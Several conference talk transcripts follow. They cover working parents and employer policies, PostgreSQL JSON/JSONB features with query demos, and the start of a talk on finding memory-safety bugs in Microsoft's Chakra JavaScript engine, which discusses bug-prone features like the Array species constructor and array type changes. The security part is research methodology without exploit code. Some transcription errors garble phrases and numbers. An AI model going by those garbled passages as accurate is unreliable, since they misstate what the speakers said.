trying to explain with this was that society expects you to do stuff. In Barcelona, one kind of stuff and in Berlin, not completely different. For example, school schedules are in Barcelona. 
You're expected to have your kid stay at school over lunch time, because the break is two hours, and if both of you have to work and you don't have family around, you have to do that. This is not as cheap as in Germany, but you are expected to do it. Care tasks: I guess all of you have seen this crazy situation like here. I strongly feel that when we do all this caring stuff, it's usually done by women, even if in Germany, or in Berlin, I see a lot of male parents taking these things on: getting the kid to the doctor, getting the kid to the daycare, and being involved in this kind of... that you do in the daycare here in Germany. It's very important that everyone is involved in these things. Another thing that drove me crazy is the difference in how we access parental benefits here. Usually, at least among my friends in Berlin, men take two months out and women take twelve months, because men still get a lot more money. In the end, society is forcing women to stay out of employment longer and out of this equation. Computers; this doesn't work now. I cannot be more emphatic about this sentence, because it's still not well known. By the way, if you wonder about this, it's an ad from the Second Republic in Spain, which was basically a fight between right-wing people and left-wing people. It says that the labor of a farmer is as important as the salary that the blue-collar worker gets. Here, I think most of us... you should know your rights and enforce them, and you should also know your duties, your responsibilities. I've seen a couple of people working during Mutterschutz in Berlin, even if that's illegal. And I've seen so many people doing Elternzeit, because we can't just have women doing the whole Elternzeit and then not being able to go back to work. Awesome. I have to go faster. There is one awesome thing that I know from Berlin, or from Germany: Kinderkrankengeld. You can get money when your kid is sick, because you can stay out of work, too. I guess this also happens here in Berlin, but it happens a lot more in Barcelona: my congratulations to all these grandparents, the Großeltern, who are actually being parents again, because we have to work twelve hours a day. Strongly said, but it happens; in Spain it happens a lot. Can we do things about it? Yes. We can encourage remote work. We can have work-from-home policies that are easy and that are not bullshit for people to ask for. We can have empathy, because when an employee is asking to stay home because he has a sick kid, it's because he has a sick kid. It's not because he's too lazy to come to the office. One very important thing is to think about time. When you schedule your meetings at 7 p.m., I will probably never be there, because I have this going-to-bed dance that everyone has to do with the kids. And using a schedule properly, recording, planning, and asynchronous communication helps a lot. I just have a little more time. Burnout: this is very important for me, because one thing that can happen after you put all this pressure on people is that they burn out. So they quit your company, they are not happy employees anymore, and you have lost an important resource that cost you money to train and to become useful. And after these tips for companies, very fast, for you as a parent: I strongly hate when people try to lecture me on what I have to do as a parent, but the only thing that I will say is talk to as many people as possible, because you can get awesome ideas on how to deal with your time challenges. And very quickly, a few numbers from this poll that I ran on the Internet.
So, 91% male answers, 9% women, much as the industry. What else can I say? I would love to get more women, but yeah. By the way, before I forget, this is kind of thank you if Diana is looking to me over the Internet because thank you to Diana Gunther. Basically, she was the master of disaster spreading this poll over the Internet. And thank you to her, kind of, 350 people answered this stuff. Mostly centered around Germany with 56%. 11% from Spain and 7% from USA. This means like Germany is good. Spain is bad and USA is worse. So you get a bit of everything here. Questions about if you took parental leave for how long? The average between one month and six months. I can kind of say here that we kind of put a lot more options, but it basically matches my feeling that most of men takes between zero and two months of absence. If you took parental leave, also your parents took parental leave. I'm kind of worried about this 40% here. Because if most of this is main, this means that women never took any parental leave. Interesting. If your partner took parental leave for how long? This basically shows the 70% of women that everyone who answers this was a male. When going back to work, have you asked to work less hours? Yes, both. 70%. Awesome. It's very interesting when both can reduce hours because both are not excluded toward work. Yes, only me. 11%. Mostly, I guess. A few men and all the women. And no, 72%. Interesting number from this is if you get family nearby or not. I mean, I live in Berlin. My family is 108. 1800 kilometers away. So, you know, it gets challenging. But nearly 62% of people got family nearby somehow. Work environments being kids-friendly. And amazing, 65%. Should be even more. But it's good. I wonder if exactly this number is because most of my colleagues answer from elastic. Employees having remote or work-from-home policy. Nearly 74%. What is amazing? We all should have these kind of policies as we will see later. Access to daycare benefits. 80% of no. Why if it's so challenging? And one thing that I did is I put free text stuff that people can write whatever they want. And stuff that they wrote that is very well done. It's flexibility. Remote work and work-from-home easy. And kids welcome at work. So, if you have a company or have a boss or you are in a management position, doing stuff like this helps that your employees keeps happy and don't burn out and actually quit. What can be improved? A company or connected daycare? I always wonder why if we get people with child and this is a complicated thing, you don't even have to get a daycare like for example, the day in Berlin. You can call your daycare nearby and say, okay, can we make a deal with you? You have happy fathers and mothers who will come back to work and will be calm down because the kid is actually in a good daycare. It's actually the second one is very interesting. The human vein comes after the business revenue. Even if you are doing business, we are dealing with humans. So, when we forget that and especially in Spain, it's strongly forgotten. We are, I mean, we are not good. One that is very interesting to me at least and I got a lot of discussions with everyone is that sometimes kids are not so unhealthy to go to sleep and still moving around, but he is not good enough as a health nurse to go to daycare. Having a room, whatever, that you can actually, like here, here we got this elder and unkinned arbaica plants where they have the daycare things for the conference. And it's awesome. It can work. 
The kid can be happy. Some more pearls from the "tell me anything" free-text field. "Why do moms need to change their schedule and not dads?" It's sad, but it happens. "The default assumption seems to be full-time young male engineers." Why do we accept that women reduce their hours but male engineers don't? Something that really amazed me: Quebec has a strong maternity plan, close to the German one. Even if it's North America, it's really good. And last, I really want to share this because it is extremely important: "The management, my team and company were not as understanding. It was amazingly stressful and difficult. I often wonder if I would have been a better parent, and my child would have had a stronger start, if I had worked for my current employer then." Humans realizing that still makes me sad. So if you are actually in a position to change stuff, do it. Or if you can talk to your employer or management, whatever, do it. It's extremely important. Just a few quick numbers from the statistics agency: usually in Germany you get 1.5 children per woman, and we get even fewer in Barcelona. And just to wrap up and finish: we have all been kids, we have been parents, we have been stressed. I don't want to see more parents who are stressed by having kids, because it's a common responsibility. Because at the end of the day, who's going to pay our pensions? Our kids. Yeah. So it's very important. And I stop talking. 39 minutes, which is kind of good. First of all, thank you very much for your presentation. I'm here to take questions. I don't have prizes like my colleague, she got everything for a question. No questions? Even comments? I mean, it's time to see if this actually makes you sad or not, because it makes me sad, and I want to change stuff. That's why I actually wanted to do this presentation. Do you think it's distracting to have your kids close to your workplace? It is. And how do you deal with that? I actually have another room for him to play in at home while I'm working. We have an office in Berlin, but I used to work from home a lot. Basically, I have a room for him and a room for me. But it makes sense that it's distracting; it's challenging. My whole point here is: try to improve it, because it is stressful, and otherwise you might actually lose talent. Anything else? No questions. Oh, you were all sleeping. It was just the time, so... So you're still around this afternoon, probably at the Elastic booth? I'm going to be around. If you see one toddler that actually screams a lot, it's mine. Okay, that's easy to figure out. So once again, thank you very much.
|
Becoming a parent is a step in many people’s life path that will arrive sooner or later, suddenly changing all your priorities. What before was critical might become less important, but what will not change is your need to work.
|
10.5446/32473 (DOI)
|
Okay. Good morning, everyone, and welcome to the first talk today here in the database area, and welcome to FrOSCon. My name is Stephanie Stöding. I'm working at PaxLife, and we are doing some crazy kinds of things, because most of you might have servers in the cloud; we have servers above the clouds. Our servers are flying, because we are doing in-flight entertainment. But we are doing it on our own devices, which doesn't mean we have flying postcards; it does mean we are flying elephants, which is totally crazy sometimes, but a lot of fun. So, that's about me and us. What today is about is Postgres and JSON. So, first of all, JSON is JavaScript Object Notation, simple as that. It was invented for JavaScript, but is now widely used for communication and interaction between applications and all these kinds of things. We don't have to care about encoding, which is a completely different situation compared to, for example, XML or parsing CSVs, because JSON is defined as Unicode, and most implementations use UTF-8. UTF-8 is an encoding of Unicode, but well, good enough. It is used for data exchange in web applications, but not only there; it is also used to exchange data between different APIs, where it turned out to be very practical as well. Currently we have two standards: there is the one by Douglas Crockford, and then there is the ECMA one. The one by Douglas Crockford is very funny, because when you print it, it's only five pages. That's the whole definition. And the other fun fact is that it's really human readable. I've seen a lot of RFCs and specs, and if you ever took a look at the standards about SQL, it's always a lot of pain to read them, because they are not very human readable and understandable. But that one is really clear in everything it says, and that makes it easy. In Postgres, we are using the one that is specified by Douglas Crockford. So, that's about that. JSON data types in Postgres are available since version 9.2, which is some years ago, so we have had it for four years now. And then there was an extension, BSON. BSON was originally done by MongoDB, and there has been an extension available on GitHub since 2013, which I played with a lot at the time, because it was better than the JSON implementation that Postgres had itself, and on the other hand it was exactly the same implementation as in MongoDB. I played a lot with Meteor at the time, and I also changed Meteor not to use MongoDB, because I wanted to have it completely ACID, so I used this BSON data type in Postgres. It was some hacking, but in the end it was running. It was only for my personal fun; I never published it, because there were a lot of bugs inside. It just answered the question: would it be possible to do it? Then JSONB was invented. JSONB came in 9.4, and it's completely different from the ones that we had before. It's compressed JSON, which is one of the most important things: when it writes data away, you don't see any JSON text saved on disk. It's fully transactional; that means everything you can do with Postgres' ACID compliance also works here with JSON. And you can use it for up to one gigabyte per field, so one record, one gigabyte per field, which is usually enough for JSON. So, now we come to the JSON functions that are available. This one is very funny, because it simply does what it's named after: row_to_json.
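As a concrete illustration of that function, here is a minimal sketch of the kind of query this refers to; the table and column names are placeholders, not the talk's actual demo schema.

  -- Return each row of an ordinary query as one JSON object per row.
  SELECT row_to_json(t)
  FROM (
      SELECT track_id, name, unit_price
      FROM track
  ) AS t;
  -- e.g. {"track_id":1,"name":"Some Track","unit_price":0.99}

Whatever columns the subquery alias exposes become the keys of the resulting JSON object.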
So, you do a usual SQL statement, and you return the complete result, each row as JSON, with just one function. We will see that later on. Then, Postgres has arrays, and it's very good that we are able to use arrays; that makes life easier inside the database, because we can handle them and store them there. But we can also export arrays as JSON, also with just one function: you call the function and it does what it is named after. jsonb_to_recordset is the opposite of that one, because you can use JSONB to return SQL data and work on it again, like you work with other tables, without any problems, if you have defined it properly. We have several operators: you can get an array element by position, or by name if you know the name; we have objects inside JSON, so you can also get an object; and you can get a value at a certain path, so: give me this value at this place in the JSON. Well, there's the other thing that you should do with JSON to make it faster, because we can use indexes on JSONB. That does not work with the plain JSON type, so indexes are only available for JSONB. Nowadays, the JSON type is mostly only used if it's just for storing and not for accessing the data later on, because it's not that fast and it's not compressed, so it consumes a lot more resources than JSONB. In Postgres, we have this nicely named GIN index, which is a generalized inverted index, and the fun part is that we can index a complete JSONB, because JSON is mostly paths, and it just works here. So we don't have to index individual values inside the JSON, as it's done, for example, by Mongo. We just create an overall index, and we can access everything through that index, which makes it much faster, and we don't have to care about certain detailed indexes. But you can even do crazy things like creating unique indexes on JSON. I don't know if it makes sense, but it's possible, so if you need it, you can do it. Now we come to the new JSON functions. With 9.6, there's one new function, jsonb_insert, which inserts a certain value at a JSONB path and returns the complete changed JSON. 9.6 is currently in beta 3 and will be out later this year, probably around September, just before the European Postgres Conference in Tallinn this year, I guess. For the details, you can already see the documentation; everything is in there with examples, and it's a nice extension to the functions that we already have. With 9.5, we got a lot more functions for JSONB, because we needed some that help us. For example, jsonb_pretty makes the JSON human readable, so it's not for computers, it's for us, so that we are able to parse the JSON with our eyes. That makes it easier when you code. jsonb_set is for updating or adding values inside JSON. Then we have new operators: the concatenation operator, where you can just put together two JSONB fields and you get the result of this concatenation, and the delete operator, where you give it a key and the key will be removed from the JSONB. If somebody is still stuck on 9.4, there is an extension available at PGXN that implements all these 9.5 functions for 9.4, so they are even usable in a slightly older version. So, what I'm using later on are these data sources from the Chinook database that is available on the web, and I will also be using some Amazon book reviews.
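Before the demos start, here is a compact sketch of the operators and the GIN index described above; the table, column and key names are invented for illustration.

  CREATE TABLE docs (id serial PRIMARY KEY, data jsonb);
  CREATE INDEX docs_data_gin ON docs USING gin (data);

  SELECT data -> 'tags' -> 0            AS first_tag,    -- array element by position
         data -> 'author' ->> 'name'    AS author_name,  -- object field, returned as text
         data #>> '{address,city}'      AS city          -- value at a certain path, returned as text
  FROM docs
  WHERE data @> '{"type": "book"}';                      -- containment query that can use the GIN index

The single GIN index covers all keys and paths in the document, which is the point made above about not having to index individual values.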
Those reviews are some years old, but they have been available on the web, so I use them to show some data examples. Speaking about the tables: these are the tables in the Chinook database that are available, and we are only using some of them. That will be this one, the artist, which only has two columns; then we use the album (it's about music, you would have guessed), and then we use the tracks, to see what is possible when working with relational data and JSON. Coming to another question: does everybody know what a CTE is? If not, please raise your hand. Okay, so it's worth talking about it. CTEs are common table expressions, and I will use them very often in my examples. They are also known as WITH queries, because you start a query with a WITH statement. The example from the Postgres documentation is that you can even do it recursively: WITH RECURSIVE, select all that data, and have an n + 1 here until it's less than 100. Then you can select from it afterwards, so you select here that t that you've defined up here, and you get a result. So to make it clear, it's another form of subselect, but when you do it as a subselect, you would have everything nested inside brackets, and this kind of query is much more human readable; it makes it really much easier to understand SQL statements that have some sort of subselect. So, let's see how it works. What I'm doing here: you see I start with a WITH, and here we are already at the common table expression. I give it a name that comes directly after the WITH, then there is the AS, and then I define what I want to do: give me the album ID, the track ID, and the name from the table track, and I want to have this data returned as JSON, each row. So I just put this row_to_json here, with just the table name that I have defined up here, and that's it. And in the result you see we have JSON, and it was not that slow, 30 milliseconds; for this, that is not slow. The advantage is that you can use your existing tables and mix them up with JSON or return them as JSON, and you can do it inside the database, and you just have it available. So, the next one would be that I extend the query. I'll make it a little bit smaller here; the beamer is not the best one. So, I'm going on with these tracks, and that is the good thing that you can do with common table expressions: you can chain them. That means here I define these tracks that we've already seen before, and here I define another one, json_tracks, and there it is: I select the row_to_json as it was done in the statement before, based on that one. And in the next one I'm going to select some album data; I select it here from the album table, go down, and I join it with the JSON. So I can access every table that I've defined previously in the common table expression, and that makes it very handy to work that way; it's really better than having it as subselects with brackets and all these kinds of things.
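Roughly, the chained CTEs described here have this shape; the quoted identifiers follow the commonly distributed Chinook schema for Postgres, so the exact names may differ slightly from the talk's demo.

  WITH tracks AS (
      SELECT "AlbumId" AS album_id, "TrackId" AS track_id, "Name" AS name
      FROM "Track"
  ),
  json_tracks AS (
      SELECT row_to_json(tracks) AS track_json   -- one JSON object per track row
      FROM tracks
  )
  SELECT * FROM json_tracks;

Each CTE can refer to the ones defined before it, which is the chaining being described.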
What I'm doing here is using the JSON data that we've already seen; that's still the last result. And here I'm joining it together with the album. To be able to do that, I defined here that I can access the album ID from that JSON that we have seen somewhere here: there's the album ID, it's a field inside the JSON, and I've returned that value as an int, so that I can use it directly in a join. So here I'm joining a table with JSON, grouping it by some data, and in the end there comes the result: here I'm selecting from what I've defined here as the albums, and I put an array_agg on top of it. So, when we have a look, we create an array; we still have the artist ID in front, and here we have lots of data already returned as arrays, where we have not only the artist, we also have the albums, and not only one: we have all albums of an artist in one row. What we can also do, instead of doing it that way every time, is use it to create a view, so that we can better handle the data that is inside this result. So I'm going again here up to the albums, there is that join again that we've seen before, and here comes the next common table expression, where I select what we've seen here, the complete array_agg of the albums, grouped by the artist ID. Now I connect that data with the artist itself, because I have the artist ID right there, so I can join them together very easily that way. And what I'm now doing is returning the complete result as JSONB: instead of having an array with an artist ID, as we've seen before, I create a view that returns the complete result as JSONB. So, I created that view; let's see how it looks. Here we see a complete data set of JSON data returned by this view that we created previously, and it's still not that slow, because it contains all artists that are in the database, with all albums and all tracks; the albums and tracks of one artist are encapsulated in one record, in one field. So now let's see how it really looks with jsonb_pretty. I'll make it a little bit bigger so that you can see it much better, and you see that jsonb_pretty really does a good job, because it creates pretty JSON in the result, with line breaks and indentation, so that it's really human readable. So if you create JSON and you are in the development process, use jsonb_pretty, because it helps you to understand what data you return. Without it, as we've seen before, everything is in one row and you don't find anything. With it, you are able to see the structure, identify the problems, and access the data. With the next one, we are getting some data from that view, and we are still using JSON methods, but what we are doing now, when you have a look: I've taken the JSON data from the view, and I convert that JSON data back into relational data again by accessing the data fields inside the JSON. So what I did is: first I had tables with structured data, standard SQL, then I turned that into JSON, and now I use that data to return it again as relational data. So it's relational data, then JSON, then relational data. It's still not that slow, running on my not-that-fast computer. We can also return a little bit more. What we have here is: I'm selecting again the data that we already had, and I return every element here.
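Going back to the view that was just described, here is a rough sketch of its shape; the view name, JSON keys and join details are illustrative, not the exact code shown on the slides.

  CREATE VIEW v_artist_json AS
  WITH album_tracks AS (
      SELECT al."ArtistId" AS artist_id,
             json_build_object('album', al."Title",
                               'tracks', json_agg(t."Name")) AS album_json
      FROM "Album" al
      JOIN "Track" t ON t."AlbumId" = al."AlbumId"
      GROUP BY al."ArtistId", al."Title"
  ),
  artist_albums AS (
      SELECT artist_id, array_agg(album_json) AS albums   -- all albums of one artist in one row
      FROM album_tracks
      GROUP BY artist_id
  )
  SELECT row_to_json(x)::jsonb AS data
  FROM (
      SELECT a."ArtistId" AS artist_id, a."Name" AS artist, aa.albums
      FROM "Artist" a
      JOIN artist_albums aa ON aa.artist_id = a."ArtistId"
  ) AS x;

Something like SELECT jsonb_pretty(data) FROM v_artist_json LIMIT 1; then shows one artist with all albums and tracks in a readable form.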
Returning every element like this means I can have the album title again as an element here and get the data out. And how does it look? Completely relational again. So here you access the data and it just returns all the data again; because we have arrays in there, we have to return them twice, so that we have the data outside the array, as relational data again. So that is the same as we have seen before with the relational data, where everything is in here, with a WHERE on the album title. You see I get it by name; that's Metallica in this case. So, just to sum it up. But we can also do it in a different way, because there is this function jsonb_to_recordset, which takes the data selected here and returns it with the definition that we give here in the AS part. Here you see a sub-select, because that is inside the jsonb_to_recordset function, where you give the query that you want to select from. So here you see I get only the data for the artist with the ID 50, and what we see here is that we still have the tracks, which are still JSONB, but the rest of it is returned as relational data again, so that we are able to access it right away. Any questions so far? Cool. So, making it smaller again so that we can see it: here I'm selecting some data again from this jsonb_to_recordset to get that data displayed that way. These are then the album ID, a track ID, the track name, the media type, whatever it is, the milliseconds (how long it is), and, for whatever reason, it has a unit price. It's just there, so I have to mention it when I return the data; I have to mention all the fields here that are inside that JSONB field to return them. Otherwise you might run into a problem, so you have to know what's inside that JSON. What I'm doing now is some sort of crazy thing. I'm creating a function for a trigger, because my computer is very slow here, so that's a little bit crazy, because what I'm going to show now is that I can even update the data in the view that we recently created. Remember that we had this view where we created JSON from relational data, and that was a very complex view, because it's not just straight connecting some tables. But in Postgres you are able to make that view writable. What you have to do is write your own function for that, and Postgres supports this with trigger functions. I only update the artist here. So what I'm doing is getting the JSON data and comparing whether there was any change. If there was a change, then I run an update on the original table, and I keep it at that here, because it would go much deeper with updating the albums and the tracks themselves, which is also possible. For that you would use upsert, which is new since 9.5, where you can insert or update data with one statement in Postgres. And then there is only some error handling, so if something goes wrong we can display an error. So that trigger function was created, but it's not attached yet; functions only become triggers once they are attached with the connection to the database object, which is sometimes very useful, because I can reuse my trigger functions. So what I'm doing now is using this trigger function and letting it run instead of an update on that view that we created recently. And now it's attached. So what I'm able to do now is manipulate data. First, only visible things: what I'm doing here is selecting some data out of the JSON to show it, and I change some data with the jsonb_set command.
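For reference, wiring up such an INSTEAD OF trigger can look roughly like the sketch below. It matches the illustrative v_artist_json above rather than the speaker's actual function, and it only handles the artist name.

  CREATE OR REPLACE FUNCTION v_artist_json_update() RETURNS trigger AS $$
  BEGIN
      -- Only touch the base table if the artist name inside the JSON changed.
      IF NEW.data->>'artist' IS DISTINCT FROM OLD.data->>'artist' THEN
          UPDATE "Artist"
             SET "Name" = NEW.data->>'artist'
           WHERE "ArtistId" = (OLD.data->>'artist_id')::int;
      END IF;
      RETURN NEW;
  END;
  $$ LANGUAGE plpgsql;

  CREATE TRIGGER v_artist_json_update_trg
      INSTEAD OF UPDATE ON v_artist_json
      FOR EACH ROW
      EXECUTE PROCEDURE v_artist_json_update();

Once the trigger is attached, an UPDATE against the view is routed into this function instead of failing.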
So what I have to give here is the field where the data is, here I name what should be changed, and here I write whatever the new value is. So I can just change data on the fly and replace text inside the JSON. That was the original artist name, and that is what I've replaced it with. But that's not written to the database; it's only inside the result that we see right here now. It's just a result where we can change JSON data on the fly. But now that we know how we could do it, we update that JSON data, and that query updates the view; let's just name it "New Metallica", I had to give it a name. Let's see how it looks, and you see the JSON has changed, and the JSON comes through the view directly from the table. Just in case you don't believe me: that is the access to the table, and I've written from JSON through the view back to the table. So you're even able to change the JSON data that you created from relational data and put it back into the original tables. That takes some effort, of course, to write all these stored procedures. I've used the standard language that is usually used, which is PL/pgSQL, but you're also able to use a lot of other languages: Python is available, JavaScript is available for writing stored procedures or functions in Postgres. So you have a choice of what you use. And recently we changed our data with the function that we see up here again, where I used jsonb_set to replace that value inside. But, as I said, there is another one: the concatenation operator. You can reuse the concatenation operator for the same thing that we did with jsonb_set, because if there is a change in a key's value, it replaces it, it overwrites it. Everything that's new extends the JSON, but existing keys are just overwritten. So that is what we see here. It's still the same as in the first example, where I have the artist ID and the original value of the JSON, I can do whatever I want, and I can also restore the correct name with the other function. So now we use the concatenation here to write the data back, to bring it back to the original name. So that works, also with the concatenation. The trigger was executed, hopefully; let's see how it looks in the JSON data. Here we see we've done with the concatenation operator the same thing that we did before with the set function. As the concatenation operator is more complex, it takes a little bit longer to manipulate the data. So when you are only changing data, use jsonb_set; if you also want to extend data, or have changes and extensions of a JSON value, then you can use the concatenation operator. What there also is, as I said previously, is the possibility to remove data with the minus operator, which you see here. And it's also not changing the result inside the table or inside the stored JSON; it's just changing some data on the fly and viewing the output. So that is the complete JSON as we had it before, and I use jsonb_pretty here again so that we are able to read it. I'll make it a little bit bigger here. That is still the complete value that we have in the JSON, and as you see here, I can change some data and work with that: the artist ID is still there, but the album is completely removed from that JSON.
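In compact form, the three modification tools just demonstrated look like this; the literal values are made up for illustration.

  SELECT jsonb_set('{"artist": "Metallica", "albums": []}'::jsonb,
                   '{artist}', '"New Metallica"');            -- replace one value at a path

  SELECT '{"artist": "Metallica"}'::jsonb
         || '{"artist": "New Metallica", "active": true}';    -- concatenation: overwrites existing keys, adds new ones

  SELECT '{"artist": "Metallica", "albums": []}'::jsonb
         - 'albums';                                          -- delete a key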
And that's so far for the comparison what you can do with relational data and JSON data to turn it upside down front and back around as you like. And it's really fast and easy in the end. What I'm doing now is going to create a table to import the data from this Amazon book reviews. So first I create that table. That's done. It's only one field inside that is that JSONB field. The data is stored in a file formatted as JSON. So I import that data that takes some seconds because well even in 1998 Amazon had several book reviews and that's it. Took seven seconds which is when we have a look for nearly 600,000 records. That's fast enough I think to import it into the database with one query. So I really love copying. So let's see how it does look like. We only take the first record here and here you see the structure is some sort of review state, whatever it is, votes, rating, helpful votes and product stuff inside grouping. There are a lot of fields inside that JSON. So now we just select some data from that JSON. What I'm doing here is I get the product title and get the average review for the rating for the review and to see what the data is about and I do it only by one category. So I have also where inside and for calculating that data from the JSON fields inside this one table having this average stuff worth nearly 250 milliseconds. It's not that slow I think but it's okay for some sort of things for 600,000 records but now let's create that GIN index that also takes obviously some time to create all the paths. It has to pass all all the JSON values inside that table. Takes nearly 20 seconds, usual, but for 600,000 records but you only do it once and then you have access through the index. And now let's see how fast it is now. Eight milliseconds. So that index was worth creating it I think. So you see it takes the index really everywhere. When you take a look at the explain plan you see that he does the index scan right here. Bitmap index scan and adjusts the index and to reduce the data and to aggregate it then afterwards it's just worth creating an index on this JSON stuff. Let's go a little bit on. Get some more data out of it. It takes a little bit longer because that's calculation about over the old data in the database. So there are lots of reviews with books that don't have a category we see here and these one have the most some of the very hard amount of reading. So and here we have the category the average rating and so we can even go over the whole data and queries data doing whatever we want with this JSON. And these kind of things is the reason why MongoDB announced early this year with their release in February I think it was. They announced that they have now an BI tool. So out of the box BI tool with MongoDB. The fun fact is at that time it turned out the BI adapter for MongoDB is Postgres. They created a foreign data wrapper where you can access external data and then you can access your MongoDB data directly from Postgres and do attach every reporting tool that you would like to attach. So what I'm doing here is I'm creating an index on the product category just to show that it is possible. It doesn't help very much because that JSON index usually does that beforehand so it's not faster than it was before. There was a difference when I did that first with 9.4 it turned out that the query was faster after I created the index. In 9.5 I tested it a lot of times and that was really an increase in what Postgres does in 9.5 in performance. 
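Putting the import-and-index workflow of this demo together, a rough sketch follows; the file path and the JSON field names are guesses for illustration, not the real Amazon review schema.

  CREATE TABLE reviews (data jsonb);

  -- one JSON document per line in the input file
  COPY reviews (data) FROM '/tmp/book_reviews.json';

  CREATE INDEX reviews_data_gin ON reviews USING gin (data);

  SELECT data -> 'product' ->> 'title'                 AS title,
         avg((data -> 'review' ->> 'rating')::numeric) AS avg_rating
  FROM reviews
  WHERE data @> '{"product": {"category": "Books"}}'   -- containment, so the GIN index can be used
  GROUP BY 1;

The containment operator is what lets the planner use the whole-column GIN index here; a plain ->> comparison in the WHERE clause would need its own expression index.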
So that's it from me about indexes, JSON, and Postgres for today. Any questions? Thank you. Yes? [Question from the audience:] So, with this, we have Hive. Can I store the JSON on HDFS, and can I still use this kind of SQL on top of it with Postgres? You can, you can do it. There's even a foreign data wrapper for Hadoop. I talk about external data, which is exactly that, tomorrow. You can put everything inside there if you need to index it. If you need to access it very often, you can also do what I did here and copy the data in from that file. What you can also do is just link the data instead of copying it, and then create materialized views on top of it. Then you can access the data in a relational way again and still have the other parts stored away as JSON; you only access them when you create the materialized views. And then you have everything available that you can use for JSONB: all functions, everything. So it gives you a lot of options for what you can do with JSON data. Any more questions? Thank you very much.
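To illustrate the "link instead of copy" answer above, here is one hedged possibility using the contrib file_fdw; the server, table and path names are invented, and other foreign data wrappers (Hadoop, MongoDB, and so on) follow the same pattern.

  CREATE EXTENSION file_fdw;
  CREATE SERVER files FOREIGN DATA WRAPPER file_fdw;

  CREATE FOREIGN TABLE reviews_raw (data jsonb)
      SERVER files
      OPTIONS (filename '/data/book_reviews.json', format 'text');

  CREATE MATERIALIZED VIEW reviews_by_category AS
  SELECT data -> 'product' ->> 'category'              AS category,
         avg((data -> 'review' ->> 'rating')::numeric) AS avg_rating
  FROM reviews_raw
  GROUP BY 1;

  REFRESH MATERIALIZED VIEW reviews_by_category;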
|
A deep walk through PostgreSQL JSON features with data examples. This includes the new and shiny PostgreSQL 9.5 JSON features.
|
10.5446/32380 (DOI)
|
So today I'm going to talk about Chakra, which is the Microsoft Edge scripting engine. There's actually a bit of a backstory to this talk that involves REcon, because at the last REcon I gave a talk on how to find vulnerabilities in Adobe Flash, but I was sort of finishing up my work and trying to figure out what to do next, and someone suggested that I look at Chakra. At that point I didn't even know that Microsoft had open sourced their JavaScript engine, but I gave it a shot and ended up finding a lot of bugs. So today I'm going to talk a bit about what I found and the approach I took to find them. So who am I? I'm Natalie Silvanovich and I'm a security researcher on Google's Project Zero. I'm an ECMAScript enthusiast; I love finding bugs in browsers and Flash and pretty much anything that processes scripts. So what is Edge and what is Chakra? Edge is the new Internet Explorer. It's Microsoft's new default browser on Windows 10, and Chakra is Edge's open source ECMAScript engine. It's regularly updated, so it's kind of nice: they didn't just upload the code once and that was it. You can actually see active development and see the CVEs as they get fixed, that sort of thing, and it accepts external contributions, so you can be the change you want to see in Microsoft Edge. So what is ECMAScript? ECMAScript is the JavaScript standard. It's what developers implement when they try to create an ECMAScript engine, and it is a living standard; there are always new versions coming out. The most recent one was ECMAScript 7, which was released in June. So why does newness matter? Something you realize quite quickly when you look at JavaScript engines is that the standard does not specify implementation. It says what the script needs to do, but not so much how to implement it. So when you're creating a new ECMAScript engine, developers need to make design decisions, and those design decisions are somewhat untested. Sometimes there are trade-offs, things like security versus performance, you know, how many checks do you put in. But sometimes there are other reasons things get done: ease of development, that sort of thing. And quite often if you look at some of the older browsers, you can see where things went wrong. You can see things that got rewritten, things that they made a concerted effort to get rid of bugs in. In some parts, especially WebKit and Firefox, you can see all the angry comments by developers as they tried to fix a certain part over and over. But you don't have this advantage with a new ECMAScript engine. This is both from the side of trying to secure it, where it's not clear where the weak points are, and also from the side of trying to find bugs: there wasn't as much to start with, because there hadn't been so many bugs found yet. And in general, attacks mature over time. I think this is really the first wave of people who've looked at Chakra, and I'm sure there'll be many bugs in the future. One thing I was a bit surprised about is that I thought there would not be a lot of bug collisions, because in a new product there should be a lot of bugs, and they haven't all been found yet. But it turned out that basically many people converged on the same bugs, and I'm not sure why that happened. It may be that they were very obvious bugs, or they were very similar to bugs that were found in other browsers. So, what were my goals?
I wanted to find a lot of bugs in Chakra, understand and improve some of the weak areas, or at least drive improvements in those areas, and I was hoping to find deep and unusual bugs, asterisk, because that didn't end up happening; everyone pretty much found the same set of bugs. My approach was mostly code review. I find that especially if you're in a situation of wanting to find a lot of bugs and do a comprehensive job, finding all the similar bugs so they can be fixed, code review is typically the best. You find quality bugs, and you kind of know their quality up front, because you know what's causing them. I thought I would find bugs that maybe live longer and are more likely to be used by attackers; all of that turned out not to be the case. And also I found it easier to fix, or get entire classes of bugs fixed. Something I found interesting is that I was talking to one of the other people who found a similar bug, used it and took it to Pwn2Own, and he said that he wasn't even sure: is it a use-after-free? Is it an overflow? That sort of thing. And that's kind of typical of bugs you find through fuzzing: sometimes it's not always clear what causes them. But if you spend a lot of time looking at the code, you can figure out why they happen and hopefully find all ten places where that happens. So how do you start? I have my RTFS there. Reading the standard, in my opinion, is really important if you want to find good browser bugs and bugs in script engines. You would be amazed by the stuff that's in there: there's pretty crazy stuff, and a lot of it causes bugs. If you can't bring yourself to read the standard, I'd recommend the Mozilla docs. They're fantabulous. They have every method, a description of the method, browser compatibility in a table, and then a link to the ECMAScript standard where you can find more information. You'd think you died and went to ECMAScript documentation heaven, which by the way is where I totally hope I go when I die. Many features are infrequently used, and these are the ones that cause bugs. I find there's almost a trade-off: every so often you do find a bug in a really commonly used feature, but most of the bugs are in stuff that less than one percent of web pages, or even way less than that, ever use. And the features can be very deeply intertwined; quite often one thing that turns up in the standard has really deep-reaching impacts in other places. One example of this is the Array species constructor. The idea here is that in JavaScript there are lots of different array methods that copy their results into a new array. For example, slice just takes a subarray: it gets two indexes, creates a new array, and copies your array into it. But then the problem is: let's say the thing I'm slicing is actually a subclass of Array and not a plain array. Do I return the new thing as the subclass or just as a regular array? And of course, instead of picking one, why don't we make this a configurable property, and then you can specify which one you want. And this is of course easily implemented by inserting a call into script into every single native array call. So that basically impacts everything you do with an array and makes it vulnerable. This can interact with other design features. For example, I think one of the most important design decisions in creating an ECMAScript engine is how arrays and objects work. Most browsers do something like this, and this is exactly what Chakra does: you start off with a very small, not complex array, and as you add new features to it, it becomes a more complex object. So in Chakra, you start off with just integers in your array, and then you're an integer array. As soon as a float gets added to you, you become a float array, and that has to be twice as long, because a float is eight bytes. And then if you add an object to it, it becomes a var array, which means that instead of having numbers in the array, you have pointers to objects. And then the very final stage of an array, which doesn't happen very often, is: what if you configure a property on the array? What if you make one element of the array read-only? Then you have to actually have a structure with the properties of every element in it, and that's what they call an ES5 array. And how do they implement this? They actually swap out the vtable. 